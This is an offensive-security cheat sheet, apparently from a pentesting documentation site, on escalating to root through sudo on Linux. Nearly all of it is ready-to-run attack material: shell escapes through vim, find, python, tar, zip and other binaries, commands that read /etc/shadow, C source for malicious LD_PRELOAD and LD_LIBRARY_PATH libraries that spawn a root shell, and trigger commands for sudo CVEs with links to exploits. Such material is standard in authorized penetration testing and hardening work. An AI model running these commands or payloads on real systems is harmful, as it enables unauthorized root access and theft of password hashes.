Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Check Sudo Permissions

sudo -l
Look for:
  • NOPASSWD — no password required
  • (ALL) or (root) — runs as root
  • Specific binaries — check GTFOBins

GTFOBins — Sudo

https://gtfobins.github.io/#+sudo

Common Entries

vim

sudo vim -c ':!/bin/bash'

find

sudo find / -exec /bin/bash \;

python

sudo python3 -c 'import os; os.system("/bin/bash")'

perl

sudo perl -e 'exec "/bin/bash";'

less

sudo less /etc/shadow
!/bin/bash

awk

sudo awk 'BEGIN {system("/bin/bash")}'

nmap

sudo nmap --interactive
!sh

env

sudo env /bin/bash

tar

sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

zip

sudo zip /tmp/a.zip /tmp/a -T --unzip-command="sh -c /bin/bash"

man

sudo man man
!/bin/bash

apache2

sudo apache2 -f /etc/shadow
Leaks first line of file in error output.

LD_PRELOAD

If sudo -l shows env_keep+=LD_PRELOAD:

Malicious Shared Library

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
Compile: 
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
Execute with any allowed sudo command: 
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/any_allowed_binary

LD_LIBRARY_PATH

If env_keep+=LD_LIBRARY_PATH:

Find Shared Libraries

ldd /usr/bin/allowed_binary

Hijack Library

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

gcc -shared -fPIC -o /tmp/libhijack.so hijack.c
sudo LD_LIBRARY_PATH=/tmp /usr/bin/allowed_binary

Sudo CVEs

CVE-2021-3156 — Baron Samedit (sudo < 1.9.5p2)

Heap buffer overflow in sudo. Any user → root. Check version: 
sudo -V | head -1
Check vulnerable: 
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
If segfault → vulnerable. Exploits: 
https://github.com/blasty/CVE-2021-3156
https://github.com/worawit/CVE-2021-3156

CVE-2019-14287 — Sudo Bypass (sudo < 1.8.28)

If sudoers has (ALL, !root) NOPASSWD: /bin/bash: 
sudo -u#-1 /bin/bash
-1 wraps to UID 0 (root).

CVE-2019-18634 — Sudo pwfeedback (sudo < 1.8.31)

If pwfeedback is enabled in /etc/sudoers: 
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S -k id

Sudo Shell Escape Sequences

Some programs allow shell escape:
ProgramEscape
vi/vim:!bash
less!bash
more!bash
man!bash
ftp!bash
gdb!bash
nmap!sh (interactive mode)